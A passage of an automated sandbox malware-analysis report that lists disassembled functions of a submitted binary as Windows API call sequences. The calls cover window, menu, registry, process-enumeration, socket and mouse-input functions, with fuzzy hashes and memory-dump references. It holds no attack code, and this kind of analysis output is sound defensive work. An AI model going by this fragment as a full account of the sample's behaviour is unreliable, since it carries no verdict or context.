                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: a057ecd516d6f7a4af55340d185d0b1f7b28c5bc43f80248be207e6f749970b1
                                                                                • Instruction ID: 51ea603bd02f5d54fc84ee25a3182f4a9d2e491efa2443b26c4d4d697bc223a3
                                                                                • Opcode Fuzzy Hash: a057ecd516d6f7a4af55340d185d0b1f7b28c5bc43f80248be207e6f749970b1
                                                                                • Instruction Fuzzy Hash: 7C213275604204AF9B10DBE8DC89DAB77ECEF493A0744C125FD4ACB261E678EC458B64
                                                                                APIs
                                                                                  • Part of subcall function 0073D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0073D1BA
                                                                                  • Part of subcall function 0073D17C: GetStockObject.GDI32(00000011), ref: 0073D1CE
                                                                                  • Part of subcall function 0073D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0073D1D8
                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0078A32D
                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0078A33A
                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0078A345
                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0078A354
                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0078A360
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Msctls_Progress32
                                                                                • API String ID: 1025951953-3636473452
                                                                                • Opcode ID: 9685e56ce209ff55f171d72e9360bf47365559d52e8b12fa7de46ed1dc60bcd2
                                                                                • Instruction ID: 36fe2d11a7f651aa13a72e85a005236a5ce8b5a7c47538873308a9eaec87ea89
                                                                                • Opcode Fuzzy Hash: 9685e56ce209ff55f171d72e9360bf47365559d52e8b12fa7de46ed1dc60bcd2
                                                                                • Instruction Fuzzy Hash: BC118EB1150219BEEF115F60CC86EEB7F6DFF09798F014115BA08A60A0C7769C21DBA4
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 0073CCF6
                                                                                • GetWindowRect.USER32(?,?), ref: 0073CD37
                                                                                • ScreenToClient.USER32(?,?), ref: 0073CD5F
                                                                                • GetClientRect.USER32(?,?), ref: 0073CE8C
                                                                                • GetWindowRect.USER32(?,?), ref: 0073CEA5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$Client$Window$Screen
                                                                                • String ID:
                                                                                • API String ID: 1296646539-0
                                                                                • Opcode ID: c2d8d0eae343860105a5342b121eb57fb127410a9dd3f44dd5d896e3958a1b0e
                                                                                • Instruction ID: 6403b1349a16991f1dd44a7d0a70a3de55c8f6510130ccf0967fa7c5d8a40410
                                                                                • Opcode Fuzzy Hash: c2d8d0eae343860105a5342b121eb57fb127410a9dd3f44dd5d896e3958a1b0e
                                                                                • Instruction Fuzzy Hash: 84B17C79A00249DBEF10CFA8C5807EEBBB1FF08340F149529EC59EB255DB38A950DB64
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00781C18
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00781C26
                                                                                • __wsplitpath.LIBCMT ref: 00781C54
                                                                                  • Part of subcall function 00741DFC: __wsplitpath_helper.LIBCMT ref: 00741E3C
                                                                                • _wcscat.LIBCMT ref: 00781C69
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00781CDF
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00781CF1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                • String ID:
                                                                                • API String ID: 1380811348-0
                                                                                • Opcode ID: d56fecd2383f3e7748a8bbf24726c718391f1a88040fa2489ebfbef201b0da97
                                                                                • Instruction ID: 4d1f7b61dbfb52b285fb51a5974e96d533dd1c823d009c7e29189ff0f91f63e7
                                                                                • Opcode Fuzzy Hash: d56fecd2383f3e7748a8bbf24726c718391f1a88040fa2489ebfbef201b0da97
                                                                                • Instruction Fuzzy Hash: CA516FB1504340DFD720EF24D885EABB7ECEF88754F00491EF58697252DB789905CBA2
                                                                                APIs
                                                                                  • Part of subcall function 00783C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00782BB5,?,?), ref: 00783C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007830AF
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007830EF
                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00783112
                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0078313B
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0078317E
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0078318B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                • String ID:
                                                                                • API String ID: 3451389628-0
                                                                                • Opcode ID: 73982347fcee6c007c1d1dd608153abcb0c8567440c0f539924c4cb3fc16320e
                                                                                • Instruction ID: 3b000f268df0af1b19213bf66cf119116018e593c65bc2284d508c2d47b26649
                                                                                • Opcode Fuzzy Hash: 73982347fcee6c007c1d1dd608153abcb0c8567440c0f539924c4cb3fc16320e
                                                                                • Instruction Fuzzy Hash: 37515A31504204EFC710EF68C889E6EB7E9FF89700F04891DF55587291DB79EA05CB52
                                                                                APIs
                                                                                • GetMenu.USER32(?), ref: 00788540
                                                                                • GetMenuItemCount.USER32(00000000), ref: 00788577
                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0078859F
                                                                                • GetMenuItemID.USER32(?,?), ref: 0078860E
                                                                                • GetSubMenu.USER32(?,?), ref: 0078861C
                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0078866D
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                • String ID:
                                                                                • API String ID: 650687236-0
                                                                                • Opcode ID: 3ebf48459c35ed14d07177f8046cb39970730ef54ce7ba480755e8def3e2e3e6
                                                                                • Instruction ID: 432ede7138f27c8b74e0d0908d81df840c0f684cee98d3f6e625ef9883932afc
                                                                                • Opcode Fuzzy Hash: 3ebf48459c35ed14d07177f8046cb39970730ef54ce7ba480755e8def3e2e3e6
                                                                                • Instruction Fuzzy Hash: E0519E71E00225EFCF51EF64C845AAEB7F4EF48310F148459E916BB352DB38AE418B95
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00764B10
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00764B5B
                                                                                • IsMenu.USER32(00000000), ref: 00764B7B
                                                                                • CreatePopupMenu.USER32 ref: 00764BAF
                                                                                • GetMenuItemCount.USER32(000000FF), ref: 00764C0D
                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00764C3E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                • String ID:
                                                                                • API String ID: 3311875123-0
                                                                                • Opcode ID: 2c2aec95d0dde8fadc3695da22b3669f667756152869321c419560ac96c2abdd
                                                                                • Instruction ID: 698adcb64687f824a078c70f0e8678f24e31498fba86b2c96f2aeab7c8fdb0a3
                                                                                • Opcode Fuzzy Hash: 2c2aec95d0dde8fadc3695da22b3669f667756152869321c419560ac96c2abdd
                                                                                • Instruction Fuzzy Hash: ED51C0B0A01249EFDF25CF68C888BADBBF4AF45318F148159EC1B9B291D7789D44CB61
                                                                                APIs
                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00778E7C
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00778E89
                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00778EAD
                                                                                • #16.WSOCK32(?,?,00000000,00000000), ref: 00778EC5
                                                                                • _strlen.LIBCMT ref: 00778EF7
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00778F6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_strlenselect
                                                                                • String ID:
                                                                                • API String ID: 2217125717-0
                                                                                • Opcode ID: 4da32b94e276f512b9e213c8d3e085df3783cd5354721d9db88015e197926a36
                                                                                • Instruction ID: 15c080582c93c64d2bb460c1fdb61ad8b0a359e39f219386b879e5c3f13fa9c9
                                                                                • Opcode Fuzzy Hash: 4da32b94e276f512b9e213c8d3e085df3783cd5354721d9db88015e197926a36
                                                                                • Instruction Fuzzy Hash: 6B41D471600104EFCB54EBA4DD89EEEB7B9AF58350F108259F51AD7291DF38AE00CB21
                                                                                APIs
                                                                                  • Part of subcall function 0073B34E: GetWindowLongW.USER32(?,000000EB), ref: 0073B35F
                                                                                • BeginPaint.USER32(?,?,?), ref: 0073AC2A
                                                                                • GetWindowRect.USER32(?,?), ref: 0073AC8E
                                                                                • ScreenToClient.USER32(?,?), ref: 0073ACAB
                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0073ACBC
                                                                                • EndPaint.USER32(?,?,?,?,?), ref: 0073AD06
                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0079E673
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                • String ID:
                                                                                • API String ID: 2592858361-0
                                                                                • Opcode ID: cedffbbbabe3c175f5699279c48e6b8ee0f8810b3ad14a304db7ad4a8ec79258
                                                                                • Instruction ID: 612bc1cefe8f711061e9acc2fb56a1f07d2440b4ea07ff769599a2dd42a71a97
                                                                                • Opcode Fuzzy Hash: cedffbbbabe3c175f5699279c48e6b8ee0f8810b3ad14a304db7ad4a8ec79258
                                                                                • Instruction Fuzzy Hash: 9541D370105301AFDB10DF24DC86FB67BA8FB59320F044269F9A58B2A2D7399C44DB62
                                                                                APIs
                                                                                • ShowWindow.USER32(007E1628,00000000,007E1628,00000000,00000000,007E1628,?,0079DC5D,00000000,?,00000000,00000000,00000000,?,0079DAD1,00000004), ref: 0078E40B
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 0078E42F
                                                                                • ShowWindow.USER32(007E1628,00000000), ref: 0078E48F
                                                                                • ShowWindow.USER32(00000000,00000004), ref: 0078E4A1
                                                                                • EnableWindow.USER32(00000000,00000001), ref: 0078E4C5
                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0078E4E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 642888154-0
                                                                                • Opcode ID: d02af539fc7b0384e5d3ac0bd63f0c59be0448404e598b7340b999f0b90c3e3f
                                                                                • Instruction ID: 4efeb48d9dbb39eeec38bf0d3cab94ea1bf8bc323c754f488ab0d786271d4a4d
                                                                                • Opcode Fuzzy Hash: d02af539fc7b0384e5d3ac0bd63f0c59be0448404e598b7340b999f0b90c3e3f
                                                                                • Instruction Fuzzy Hash: 9C415E30641180EFDB26DF24C499F947BE1BF09314F1881A9FA5D8F6A2C779A845CB51
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 007698D1
                                                                                  • Part of subcall function 0073F4EA: std::exception::exception.LIBCMT ref: 0073F51E
                                                                                  • Part of subcall function 0073F4EA: __CxxThrowException@8.LIBCMT ref: 0073F533
                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00769908
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00769924
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0076999E
                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007699B3
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 007699D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 2537439066-0
                                                                                • Opcode ID: d575665f6222a33131a80998ea5cca6440d2ed775927b8878602b5807cec83a6
                                                                                • Instruction ID: 0585f21257faad921726331ac31fa4e0ebc0bcde30357d4ded07a978c15d9d32
                                                                                • Opcode Fuzzy Hash: d575665f6222a33131a80998ea5cca6440d2ed775927b8878602b5807cec83a6
                                                                                • Instruction Fuzzy Hash: E6319471900205EBDB10DF94DC89E6EB778FF85710F148069F905AB286D738DE11CB64
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,007777F4,?,?,00000000,00000001), ref: 00779B53
                                                                                  • Part of subcall function 00776544: GetWindowRect.USER32(?,?), ref: 00776557
                                                                                • GetDesktopWindow.USER32 ref: 00779B7D
                                                                                • GetWindowRect.USER32(00000000), ref: 00779B84
                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00779BB6
                                                                                  • Part of subcall function 00767A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00767AD0
                                                                                • GetCursorPos.USER32(?), ref: 00779BE2
                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00779C44
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                • String ID:
                                                                                • API String ID: 4137160315-0
                                                                                • Opcode ID: 59f05e1c96e8480d8a7b4ac4dfc704def66f05ad9d7b66e4b479b5c3eb83c8b7
                                                                                • Instruction ID: 3aedb286b0ecb8ef8ec4162e0a2d409985073b4752a36084be82970ddb317cdf
                                                                                • Opcode Fuzzy Hash: 59f05e1c96e8480d8a7b4ac4dfc704def66f05ad9d7b66e4b479b5c3eb83c8b7
                                                                                • Instruction Fuzzy Hash: F631E1B2504305ABCB20DF58D849F9AB7E9FF89354F00491AF68AD7191D634E918CB92
                                                                                APIs
                                                                                  • Part of subcall function 0073AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0073AFE3
                                                                                  • Part of subcall function 0073AF83: SelectObject.GDI32(?,00000000), ref: 0073AFF2
                                                                                  • Part of subcall function 0073AF83: BeginPath.GDI32(?), ref: 0073B009
                                                                                  • Part of subcall function 0073AF83: SelectObject.GDI32(?,00000000), ref: 0073B033
                                                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0078EC20
                                                                                • LineTo.GDI32(00000000,00000003,?), ref: 0078EC34
                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0078EC42
                                                                                • LineTo.GDI32(00000000,00000000,?), ref: 0078EC52
                                                                                • EndPath.GDI32(00000000), ref: 0078EC62
                                                                                • StrokePath.GDI32(00000000), ref: 0078EC72
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                • String ID:
                                                                                • API String ID: 43455801-0
                                                                                • Opcode ID: 1a443f8e691619cf4e5d876019bd90e621753ade554c8123cfc0e10db175fd86
                                                                                • Instruction ID: 68d0d20e6e5e82adfb4a0f7aabe7689b4bf4c62dbc267503f05efeb1c105865f
                                                                                • Opcode Fuzzy Hash: 1a443f8e691619cf4e5d876019bd90e621753ade554c8123cfc0e10db175fd86
                                                                                • Instruction Fuzzy Hash: 8D11177240014DBFEF129F90DC88EEA7F6DEB09350F04C122BE099A160D7759E55DBA4
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0075E1C0
                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0075E1D1
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0075E1D8
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0075E1E0
                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0075E1F7
                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0075E209
                                                                                  • Part of subcall function 00759AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00759A05,00000000,00000000,?,00759DDB), ref: 0075A53A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                • String ID:
                                                                                • API String ID: 603618608-0
                                                                                • Opcode ID: adca8300bac0a0c4d4960a1dc69e3c998ce7b2b3944f201c59e02e5a581e9b6c
                                                                                • Instruction ID: c40cc9e7429d807c115ddc30367a880b83ea75fc6c9468cf9acd57b0f8deff4b
                                                                                • Opcode Fuzzy Hash: adca8300bac0a0c4d4960a1dc69e3c998ce7b2b3944f201c59e02e5a581e9b6c
                                                                                • Instruction Fuzzy Hash: EE0184B5A40618BFEB109FA58C45B5EBFB8EB89351F008066EE05A7290DA749D01CFA0
                                                                                APIs
                                                                                • __init_pointers.LIBCMT ref: 00747B47
                                                                                  • Part of subcall function 0074123A: __initp_misc_winsig.LIBCMT ref: 0074125E
                                                                                  • Part of subcall function 0074123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00747F51
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00747F65
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00747F78
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00747F8B
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00747F9E
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00747FB1
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00747FC4
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00747FD7
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00747FEA
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00747FFD
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00748010
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00748023
